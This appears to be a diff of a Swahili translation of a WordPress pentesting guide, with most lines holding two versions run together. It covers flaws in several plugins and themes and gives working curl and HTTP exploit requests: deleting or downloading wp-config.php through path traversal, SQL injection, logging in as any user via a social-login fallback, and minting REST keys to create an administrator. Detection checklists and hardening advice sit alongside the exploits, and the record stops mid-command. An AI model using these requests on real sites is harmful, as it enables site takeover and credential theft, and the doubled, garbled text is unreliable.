The Litho multipurpose theme (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha *Remove Font Family* na mwishowe ikatuma msimbo ufuatao (umepunguzwa): Mandhari ya Litho multipurpose (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha *Remove Font Family* na hatimaye ilitoa code ifuatayo (imefupishwa):
```php ```php
function litho_remove_font_family_action_data() { function litho_remove_font_family_action_data() {
if ( empty( $_POST['fontfamily'] ) ) { if ( empty( $_POST['fontfamily'] ) ) {
@ -438,33 +438,33 @@ Masuala yaliyotokana na kipande hiki:
* **Ufikiaji bila uthibitisho** hook ya `wp_ajax_nopriv_` imejisajili. * **Ufikiaji bila uthibitisho** hook ya `wp_ajax_nopriv_` imejisajili.
* **Hakuna ukaguzi wa nonce / capability** mgeni yeyote anaweza kufikia endpoint. * **Hakuna ukaguzi wa nonce / capability** mgeni yeyote anaweza kufikia endpoint.
* **Hakuna kusafishwa kwa path** mfuatano uliodhibitiwa na mtumiaji `fontfamily` unaunganishwa kwenye njia ya filesystem bila kuchujwa, kuruhusu `../../` traversal ya kawaida. * **Hakuna kusafishwa kwa njia** kamba inayodhibitiwa na mtumiaji `fontfamily` inaunganishwa kwenye njia ya filesystem bila kuchujwa, ikiruhusu classic `../../` traversal.
#### Utekelezaji #### Utekelezaji
Mshambuliaji anaweza kufuta faili yoyote au saraka **chini ya saraka ya msingi ya uploads** (kwa kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST: Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya uploads base directory** (kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
```bash ```bash
curl -X POST https://victim.com/wp-admin/admin-ajax.php \ curl -X POST https://victim.com/wp-admin/admin-ajax.php \
-d 'action=litho_remove_font_family_action_data' \ -d 'action=litho_remove_font_family_action_data' \
-d 'fontfamily=../../../../wp-config.php' -d 'fontfamily=../../../../wp-config.php'
``` ```
Because `wp-config.php` lives outside *uploads*, four `../` sequences are enough on a default installation. Deleting `wp-config.php` forces WordPress into the *installation wizard* on the next visit, enabling a full site take-over (the attacker merely supplies a new DB configuration and creates an admin user). Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye usakinishaji wa kawaida. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *msaidizi wa usanidi* kwenye ziara inayofuata, na kuwezesha kuchukua tovuti kwa ukamilifu (mshambuliaji anatolewa tu usanidi mpya wa DB na kuunda mtumiaji admin).
Malengo mengine yenye athari ni faili za `.php` za plugin/theme (kuvunja plugin za usalama) au sheria za `.htaccess`. Other impactful targets include plugin/theme `.php` files (to break security plugins) or `.htaccess` rules.
#### Detection checklist #### Detection checklist
* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayoitisha filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.). * Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayoitisha filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, etc.).
* Kuambatanisha input ya mtumiaji isiyosafishwa ndani ya paths (tazama `$_POST`, `$_GET`, `$_REQUEST`). * Kuunganisha maingizo ya mtumiaji ambayo hayaja safishwa katika paths (tazama `$_POST`, `$_GET`, `$_REQUEST`).
* Kukosekana kwa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`. * Ukosefu wa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
--- ---
### Kuinua mamlaka kupitia urejeshaji wa role zilizobaki na kukosekana kwa idhini (ASE "View Admin as Role") ### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")
Mengi ya plugins hutekeleza kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role(s) za awali katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejeshaji inategemea tu vigezo vya ombi (mf., `$_REQUEST['reset-for']`) na orodha inayodumishwa na plugin bila kuangalia capabilities na nonce halali, hii inageuka kuwa kuinua mamlaka kwa mtazamo wima. Many plugins implement a "view as role" or temporary role-switching feature by saving the original role(s) in user meta so they can be restored later. If the restoration path relies only on request parameters (e.g., `$_REQUEST['reset-for']`) and a plugin-maintained list without checking capabilities and a valid nonce, this becomes a vertical privilege escalation.
Mfano wa maisha halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Tawi la reset liliurejesha role kulingana na `reset-for=<username>` ikiwa jina la mtumiaji lilionekana katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uhakiki wa nonce kabla ya kuondoa role za sasa na kuziwekea tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`: Mfano wa dunia halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Tawi la reset liliurejesha role kulingana na `reset-for=<username>` ikiwa jina la mtumiaji lilitokea katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uthibitisho wa nonce kabla ya kuondoa role za sasa na kuongeza tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
```php ```php
// Simplified vulnerable pattern // Simplified vulnerable pattern
if ( isset( $_REQUEST['reset-for'] ) ) { if ( isset( $_REQUEST['reset-for'] ) ) {
@ -479,13 +479,13 @@ foreach ( $orig as $r ) { $u->add_role( $r ); }
} }
} }
``` ```
Kwa nini inaweza kutumika Why its exploitable
- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila idhinisho upande wa seva. - Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila uthibitisho upande wa seva.
- Ikiwa mtumiaji alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na baadaye alishushwa hadhi, anaweza kuzirejesha kwa kufikia reset path. - Ikiwa mtumiaji hapo awali alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na alipunguzwa, anaweza kuzirejesha kwa kufikia reset path.
- Katika baadhi ya deployments, mtumiaji yeyote aliyethibitishwa angeweza kusababisha reset kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji lililovunjika). - Katika baadhi ya usanikishaji, mtumiaji yeyote aliyethibitishwa anaweza kusababisha reset kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji lililovunjika).
Matumizi ya udhaifu (mfano) Utekelezaji wa shambulio (mfano)
```bash ```bash
# While logged in as the downgraded user (or any auth user able to trigger the code path), # While logged in as the downgraded user (or any auth user able to trigger the code path),
# hit any route that executes the role-switcher logic and include the reset parameter. # hit any route that executes the role-switcher logic and include the reset parameter.
@ -493,23 +493,23 @@ Matumizi ya udhaifu (mfano)
curl -s -k -b 'wordpress_logged_in=...' \ curl -s -k -b 'wordpress_logged_in=...' \
'https://victim.example/wp-admin/?reset-for=<your_username>' 'https://victim.example/wp-admin/?reset-for=<your_username>'
``` ```
On vulnerable builds this removes current roles and re-adds the saved original roles (e.g., `administrator`), effectively escalating privileges. Katika builds zilizo hatarini, hii inaondoa current roles na kuzirudisha tena saved original roles (mfano, `administrator`), na kwa ufanisi escalating privileges.
Orodha ya kugundua Detection checklist
- Angalia vipengele vya kubadilisha role vinavyohifadhi “original roles” katika user meta (mfano, `_asenha_view_admin_as_original_roles`). - Tazama role-switching features ambazo zinaweka “original roles” ndani ya user meta (mfano, `_asenha_view_admin_as_original_roles`).
- Tambua njia za reseti/urejesho ambazo: - Tambua reset/restore paths ambazo:
- Soma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`. - Kusoma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
- Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`. - Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
- Rudisha idhini kwa kuzingatia array ya chaguo la plugin (mfano, `viewing_admin_as_role_are`) badala ya uwezo wa mhusika. - Kuruhusu kwa msingi wa plugin option array (mfano, `viewing_admin_as_role_are`) badala ya capabilities za mhusika.
--- ---
### Kuongezeka kwa ruhusa kwa watumiaji wasioathibitishwa kupitia cookietrusted user switching kwenye hook ya umma `init` (Service Finder “sf-booking”) ### Unauthenticated privilege escalation via cookietrusted user switching on public init (Service Finder “sf-booking”)
Baadhi ya plugins huunganisha user-switching helpers kwenye hook ya umma `init` na hutumia utambulisho kutoka kwa cookie inayodhibitiwa na mteja. Ikiwa msimbo unaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiyetambulishwa anaweza kulazimisha login kama user ID yeyote. Baadhi ya plugins huhusisha user-switching helpers na public `init` hook na hupata utambulisho kutoka kwa cookie inayoendeshwa na mteja. Ikiwa code inaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiye na uthibitisho anaweza kulazimisha login kama arbitrary user ID.
Mfano wa kawaida wenye udhaifu (umeshindwa kidogo kutoka Service Finder Bookings ≤ 6.1): Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
```php ```php
function service_finder_submit_user_form(){ function service_finder_submit_user_form(){
if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) { if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
@ -538,11 +538,11 @@ wp_die('Original user not found.');
wp_die('No original user found to switch back to.'); wp_die('No original user found to switch back to.');
} }
``` ```
Why its exploitable Kwa nini inaweza kutumiwa
- Hook ya `init` ya umma inafanya handler ipatikane kwa unauthenticated users (no `is_user_logged_in()` guard). - Hook ya umma `init` inafanya handler upatikane kwa watumiaji wasiothibitishwa (hakuna kinga ya `is_user_logged_in()`).
- Kitambulisho kinatokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`). - Utambulisho unatokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`).
- Simu ya moja kwa moja kwa `wp_set_auth_cookie($uid)` inamwingiza muombaji kama mtumiaji huyo bila capability/nonce checks. - Kuitwa moja kwa moja kwa `wp_set_auth_cookie($uid)` hufanya mwombaji aingie kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce.
Exploitation (unauthenticated) Exploitation (unauthenticated)
```http ```http
@ -554,32 +554,32 @@ Connection: close
``` ```
--- ---
### Mambo ya WAF kwa CVEs za WordPress/plugin ### WAF considerations for WordPress/plugin CVEs
WAF za generic za edge/server zimeelekezwa kwa mifumo pana (SQLi, XSS, LFI). Matatizo mengi ya highimpact ya WordPress/plugin ni hitilafu maalum za logic/auth za application ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine itakapotambua routes za WordPress na semantics za plugin. WAFs za edge/server za kawaida zimewekwa kwa mifumo pana (SQLi, XSS, LFI). Mengi ya mdudu wa WordPress/plugin wenye athari kubwa ni bug za mantiki/uthibitisho za programu ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine inafahamu routes za WordPress na semantics za plugin.
Vidokezo vya kushambulia Offensive notes
- Lenga endpoints maalum za plugin kwa payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes. - Lenga endpoints maalum za plugin kwa payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
- Tumia njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi zinafanikiwa bila obfuscation. - Anzisha kwa njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Payloads za default mara nyingi hufanikiwa bila kufichwa.
- Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect. - Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
Vidokezo vya ulinzi Defensive notes
- Usitegemee saini za generic za WAF kulinda CVEs za plugin. Tekeleza virtual patches maalum za vulnerability kwenye application-layer au sasisha haraka. - Usitegemee saini za WAF za kawaida ili kulinda plugin CVEs. Tekeleza virtual patches maalum kwa tabaka la application kwa ajili ya hitilafu au sasisha haraka.
- Tumia positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya negative regex filters. - Nenda kwa positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya vichujio hasi vya regex.
## Ulinzi wa WordPress ## WordPress Protection
### Sasisho za kawaida ### Regular Updates
Hakikisha WordPress, plugins, na themes viko updated. Pia thibitisha kuwa automated updating imewezeshwa katika wp-config.php: Hakikisha WordPress, plugins, na themes zimesasishwa. Pia thibitisha kwamba sasisho za moja kwa moja zimewezeshwa katika wp-config.php:
```bash ```bash
define( 'WP_AUTO_UPDATE_CORE', true ); define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' ); add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' ); add_filter( 'auto_update_theme', '__return_true' );
``` ```
Pia, **weka tu plugins na themes za WordPress zinazoweza kuaminika**. Pia, **wasakinishe tu WordPress plugins na themes zinazoweza kuaminiwa**.
### Plugins za Usalama ### Plugins za Usalama
@ -590,15 +590,15 @@ Pia, **weka tu plugins na themes za WordPress zinazoweza kuaminika**.
### **Mapendekezo Mengine** ### **Mapendekezo Mengine**
- Ondoa mtumiaji wa chaguo-msingi **admin** - Ondoa mtumiaji wa chaguo-msingi **admin**
- Tumia **nywila zenye nguvu** na **2FA** - Tumia **nenosiri imara** na **2FA**
- Kila mara **kagua** **ruhusa** za watumiaji - Mara kwa mara **kagua** **idhinishaji** za watumiaji
- **Punguza majaribio ya kuingia** ili kuzuia mashambulizi ya Brute Force - **Punguza majaribio ya kuingia** ili kuzuia mashambulizi ya Brute Force
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji ndani tu au kutoka kwa anwani za IP maalum. - Badili jina la faili **`wp-admin.php`** na ruhusu ufikiaji tu ndani au kutoka anwani za IP maalum.
### SQL Injection isiyothibitishwa kupitia uidhinishaji duni (WP Job Portal <= 2.3.2) ### SQL Injection isiyo na uthibitisho kupitia uhalalishaji usio wa kutosha (WP Job Portal <= 2.3.2)
Plugin ya recruitment ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo ufuatao wenye udhaifu ndani ya `modules/category/model.php::validateFormData()`: Plugin ya uajiri ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo ufuatao wenye hatari ndani ya `modules/category/model.php::validateFormData()`:
```php ```php
$category = WPJOBPORTALrequest::getVar('parentid'); $category = WPJOBPORTALrequest::getVar('parentid');
$inquery = ' '; $inquery = ' ';
@ -610,17 +610,17 @@ $query = "SELECT max(ordering)+1 AS maxordering FROM "
``` ```
Masuala yaliyotokana na kipande hiki cha msimbo: Masuala yaliyotokana na kipande hiki cha msimbo:
1. **Unsanitised user input** `parentid` inatoka moja kwa moja kutoka kwenye ombi la HTTP. 1. **Ingizo la mtumiaji lisilosafishwa** `parentid` linaelekezwa moja kwa moja kutoka kwa ombi la HTTP.
2. **String concatenation inside the WHERE clause** hakuna `is_numeric()` / `esc_sql()` / prepared statement. 2. **String concatenation ndani ya WHERE clause** hakuna `is_numeric()` / `esc_sql()` / prepared statement.
3. **Unauthenticated reachability** ingawa action inatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mgeni yeyote anaweza kuipata kutoka kwenye ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`. 3. **Ufikiaji bila uthibitisho** ingawa hatua inatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mgeni yeyote anaweza kuupata kutoka ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`.
#### Exploitation #### Utekelezaji
1. Chukua nonce mpya: 1. Pata nonce mpya:
```bash ```bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4 curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
``` ```
2. Weka SQL yoyote kwa kutumia vibaya `parentid`: 2. Ingiza arbitrary SQL kwa kutumia `parentid`:
```bash ```bash
curl -X POST https://victim.com/wp-admin/admin-post.php \ curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \ -d 'task=savecategory' \
@ -628,20 +628,20 @@ curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'parentid=0 OR 1=1-- -' \ -d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id=' -d 'cat_title=pwn' -d 'id='
``` ```
Jibu linafunua matokeo ya query iliyotiwa au linabadilisha database, kuthibitisha SQLi. Jibu linafunua matokeo ya query iliyotiwa au hubadilisha database, kuthibitisha SQLi.
### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2) ### Ufikiaji bila uthibitisho Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
Kazi nyingine, **downloadcustomfile**, iliwaruhusu wageni kupakua **any file on disk** kupitia path traversal. Sink dhaifu iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`: Kazi nyingine, **downloadcustomfile**, iliruhusu wageni kupakua **faili yoyote kwenye diski** kupitia path traversal. Sink yenye udhaifu iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`:
```php ```php
$file = $path . '/' . $file_name; $file = $path . '/' . $file_name;
... ...
echo $wp_filesystem->get_contents($file); // raw file output echo $wp_filesystem->get_contents($file); // raw file output
``` ```
`$file_name` inayodhibitiwa na mshambuliaji na inachanganywa **bila kusafishwa**. Tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka ukurasa wa resume. `$file_name` inadhibitiwa na mshambulizi na imeunganishwa **bila kusafishwa**. Mara nyingine, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka kwenye ukurasa wa resume.
#### Utekelezaji #### Utekelezaji wa shambulio
```bash ```bash
curl -G https://victim.com/wp-admin/admin-post.php \ curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'task=downloadcustomfile' \ --data-urlencode 'task=downloadcustomfile' \
@ -650,13 +650,13 @@ curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'entity_id=1' \ --data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php' --data-urlencode 'file_name=../../../wp-config.php'
``` ```
Seva inarejesha yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys. Seva inajibu na yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
## Uchukuzi wa akaunti bila uthibitisho kupitia Social Login AJAX fallback (Jobmonster Theme <= 4.7.9) ## Kuchukua akaunti bila uthibitisho kupitia Social Login AJAX fallback (Jobmonster Theme <= 4.7.9)
Mandhari/plugini nyingi huja na "social login" helpers zilizoonyeshwa kupitia admin-ajax.php. Ikiwa action ya AJAX bila uthibitisho (wp_ajax_nopriv_...) itaamini client-supplied identifiers wakati provider data inakosekana na kisha itaita wp_set_auth_cookie(), hili linakuwa full authentication bypass. Mada/plugini nyingi zinakuja na "social login" helpers zilizofunguliwa kupitia admin-ajax.php. Ikiwa action ya AJAX isiyothibitishwa (wp_ajax_nopriv_...) inamwamini kitambulisho kilichotolewa na mteja wakati data ya provider haipo na kisha inaitisha wp_set_auth_cookie(), hii inakuwa bypass kamili ya uthibitisho.
Mfano wa kawaida wa muundo mbovu (umewekwa kwa ufupi) Mfano wa kawaida wa muundo mbovu (imefupishwa)
```php ```php
public function check_login() { public function check_login() {
// ... request parsing ... // ... request parsing ...
@ -687,15 +687,15 @@ wp_send_json(['status' => 'not_user']);
``` ```
Kwa nini inaweza kutumika Kwa nini inaweza kutumika
- Unauthenticated reachability via admin-ajax.php (wp_ajax_nopriv_… action). - Inafikiwa bila uthibitisho kupitia admin-ajax.php (wp_ajax_nopriv_… action).
- Hakuna ukaguzi wa nonce/capability kabla ya mabadiliko ya hali. - Hakuna ukaguzi wa nonce/capability kabla ya mabadiliko ya hali.
- Uthibitisho wa OAuth/OpenID provider umekosekana; default branch inakubali attacker input. - Hakuna uthibitisho wa OAuth/OpenID provider; tawi la default linakubali pembejeo ya mdukuji.
- get_user_by('email', $_POST['id']) ikifuatiwa na wp_set_auth_cookie($uid) inamtambulisha muomba kama anuani yoyote ya barua pepe iliyopo. - get_user_by('email', $_POST['id']) ikifuatiwa na wp_set_auth_cookie($uid) inamthibitisha muombaji kama anwani yoyote ya barua pepe iliyopo.
Exploitation (unauthenticated) Utekelezaji (bila uthibitisho)
- Mahitaji ya awali: attacker anaweza kufikia /wp-admin/admin-ajax.php na anajua/anakisia anwani halali ya barua pepe ya mtumiaji. - Mahitaji: mdukuji anaweza kufikia /wp-admin/admin-ajax.php na anajua/anakisia barua pepe ya mtumiaji halali.
- Weka provider kuwa thamani isiyoungwa mkono (au uiache) ili kufikia default branch na upitishie id=<victim_email>. - Weka provider kuwa thamani isiyoungwa mkono (au uiachie) ili kufikia tawi la default na kupitisha id=<victim_email>.
```http ```http
POST /wp-admin/admin-ajax.php HTTP/1.1 POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.tld Host: victim.tld
@ -708,41 +708,41 @@ action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com
curl -i -s -X POST https://victim.tld/wp-admin/admin-ajax.php \ curl -i -s -X POST https://victim.tld/wp-admin/admin-ajax.php \
-d "action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com" -d "action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com"
``` ```
Viashiria vilivyotarajiwa vya mafanikio Expected success indicators
- HTTP 200 with JSON body like {"status":"success","message":"Login successfully."}. - HTTP 200 with JSON body like {"status":"success","message":"Login successfully."}.
- Set-Cookie: wordpress_logged_in_* for the victim user; subsequent requests are authenticated. - Set-Cookie: wordpress_logged_in_* for the victim user; subsequent requests are authenticated.
Kupata jina la action Finding the action name
- Inspect the theme/plugin for add_action('wp_ajax_nopriv_...', '...') registrations in social login code (e.g., framework/add-ons/social-login/class-social-login.php). - Inspect the theme/plugin for add_action('wp_ajax_nopriv_...', '...') registrations in social login code (e.g., framework/add-ons/social-login/class-social-login.php).
- Grep for wp_set_auth_cookie(), get_user_by('email', ...) inside AJAX handlers. - Grep for wp_set_auth_cookie(), get_user_by('email', ...) inside AJAX handlers.
Orodha ya kugundua Detection checklist
- Web logs showing unauthenticated POSTs to /wp-admin/admin-ajax.php with the social-login action and id=<email>. - Web logs showing unauthenticated POSTs to /wp-admin/admin-ajax.php with the social-login action and id=<email>.
- 200 responses with the success JSON immediately preceding authenticated traffic from the same IP/User-Agent. - 200 responses with the success JSON immediately preceding authenticated traffic from the same IP/User-Agent.
Kuimarisha Hardening
- Usitafsiri utambulisho kutoka kwa pembejeo ya client. Kubali tu emails/IDs zinazoanzishwa na provider token/ID iliyothibitishwa. - Do not derive identity from client input. Only accept emails/IDs originating from a validated provider token/ID.
- Require CSRF nonces and capability checks even for login helpers; avoid registering wp_ajax_nopriv_ unless strictly necessary. - Require CSRF nonces and capability checks even for login helpers; avoid registering wp_ajax_nopriv_ unless strictly necessary.
- Thibitisha na hakiki majibu ya OAuth/OIDC upande wa server; kataa providers zisizopo au zisizo halali (usiwe na fallback kwa POST id). - Validate and verify OAuth/OIDC responses server-side; reject missing/invalid providers (no fallback to POST id).
- Fikiria kuzima kwa muda social login au kufanya virtual patching upande wa edge (zuia action iliyo dhaifu) hadi itakaposahihishwa. - Consider temporarily disabling social login or virtually patching at the edge (block the vulnerable action) until fixed.
Tabia iliyorekebishwa (Jobmonster 4.8.0) Patched behaviour (Jobmonster 4.8.0)
- Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']).
## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82) ## Kupandishwa kwa ruhusa bila uthibitisho via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82)
Baadhi ya plugins zinaonyesha REST endpoints zinazotengeneza reusable “connection keys” au tokens bila kuthibitisha uwezo wa aliyeomba. Ikiwa route inathibitisha tu kwa sifa inayoweza kukisia (mfano, username) na haifungishi key kwa user/session yenye capability checks, mshambuliaji yeyote asiye authenticated anaweza kutengeneza key na kuita vitendo vyenye haki za juu (kuunda account ya admin, plugin actions → RCE). Baadhi ya plugins huweka wazi REST endpoints zinazotengeneza reusable "connection keys" au tokens bila kuthibitisha uwezo wa mtaarifu. Ikiwa route inafanya authentication kwa sifa inayoweza kubahatishwa tu (mfano, username) na haitoi ufunganaji wa key kwa user/session kwa checks za capability, mshambuliaji asiyeuthibitisha anaweza kutengeneza key na kuiita kwa hatua zenye ruhusa (admin account creation, plugin actions → RCE).
- Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection - Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection
- Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback - Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback
- Impact: full takeover by chaining the minted key to internal privileged actions - Impact: full takeover by chaining the minted key to internal privileged actions
PoC tengeneza connection key na uitumie PoC mint a connection key and use it
```bash ```bash
# 1) Obtain key (unauthenticated). Exact payload varies per plugin # 1) Obtain key (unauthenticated). Exact payload varies per plugin
curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \ curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \
@ -757,53 +757,53 @@ curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \
--data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}' --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}'
``` ```
Kwa nini inaweza kutumiwa Kwa nini inaweza kutumiwa
- REST route nyeti inalindwa tu na uthibitisho wa utambulisho wa entropi ya chini (username) au permission_callback inayokosekana - Sensitive REST route ilindwa tu na ushahidi wa utambulisho wenye entropy ndogo (username) au kukosekana kwa permission_callback
- Hakuna utekelezaji wa capability; funguo iliyotengenezwa inakubaliwa kama bypass ya jumla - Hakuna utekelezaji wa capability; minted key inakubaliwa kama njia ya kupita bila vizuizi
Orodha ya utambuzi Detection checklist
- Grep code ya plugin kwa register_rest_route(..., [ 'permission_callback' => '__return_true' ]) - Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ])
- Route yoyote inayotoa tokens/keys msingi kwenye utambulisho uliowezwa na ombi (username/email) bila kuhusisha na mtumiaji aliyethibitishwa au capability - Route yoyote inayotoa tokens/keys kwa msingi wa identity iliyotolewa na ombi (username/email) bila kuihusisha na authenticated user au capability
- Angalia routes zilizofuata zinazokubali token/key iliyotengenezwa bila ukaguzi wa capability upande wa server - Tafuta routes zinazofuata zinazokubali minted token/key bila ukaguzi wa capability upande wa server
Kuimarisha usalama Hardening
- Kwa REST route yoyote yenye privileges: hitaji permission_callback inayotekeleza current_user_can() kwa capability inayohitajika - Kwa route yoyote ya REST yenye mamlaka: weka permission_callback inayotekeleza current_user_can() kwa capability inayohitajika
- Usitengeneze funguo zenye muda mrefu kutoka kwa utambulisho uliotolewa na mteja; ikiwa inahitajika, toa tokens fupi-muda, zenye uhusiano na mtumiaji baada ya authentication na ukague tena capabilities wakati wa matumizi - Usitengeneze (mint) long-lived keys kutoka kwa identity iliyotolewa na client; kama inahitajika, toa short-lived, user-bound tokens post-authentication na rudia ukaguzi wa capabilities wakati zinapotumika
- Thibitisha muktadha wa mtumiaji wa mpiga wito (caller) (wp_set_current_user haitoshi peke yake) na kata maombi ambapo !is_user_logged_in() || !current_user_can(<cap>) - Thibitisha muktadha wa user wa mtumaji (wp_set_current_user is not sufficient alone) na kata maombi ambapo !is_user_logged_in() || !current_user_can(<cap>)
--- ---
## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3) ## Nonce gate misuse → ufungaji wa plugin kiholela bila uthibitisho (FunnelKit Automations ≤ 3.5.3)
Nonces zinazuia CSRF, si uthibitisho wa ruhusa. Ikiwa code itachukulia kupitishwa kwa nonce kama kibali na kisha kuruka ukaguzi wa capability kwa operesheni zenye ruhusa (mf., install/activate plugins), washambuliaji wasio na uthibitisho wanaweza kukidhi mahitaji dhaifu ya nonce na kufikia RCE kwa kusakinisha plugin backdoored au yenye udhaifu. Nonces huzuia CSRF, sio idhini. Ikiwa code itashughulikia kupitishwa kwa nonce kama ishara ya kuendelea kisha ikaruka ukaguzi wa capability kwa operesheni zenye mamlaka (mf., install/activate plugins), washambuliaji wasiothibitishwa wanaweza kukidhi hitaji dhaifu la nonce na kufikia RCE kwa kusakinisha plugin iliyo na backdoor au yenye udhaifu.
- Vulnerable path: plugin/install_and_activate - Vulnerable path: plugin/install_and_activate
- Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes” - Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes”
- Impact: full compromise via arbitrary plugin install/activation - Impact: full compromise via arbitrary plugin install/activation
PoC (umbo hutegemea plugin; ni kwa mfano tu) PoC (muundo unategemea plugin; mfano tu)
```bash ```bash
curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_activate \ curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_activate \
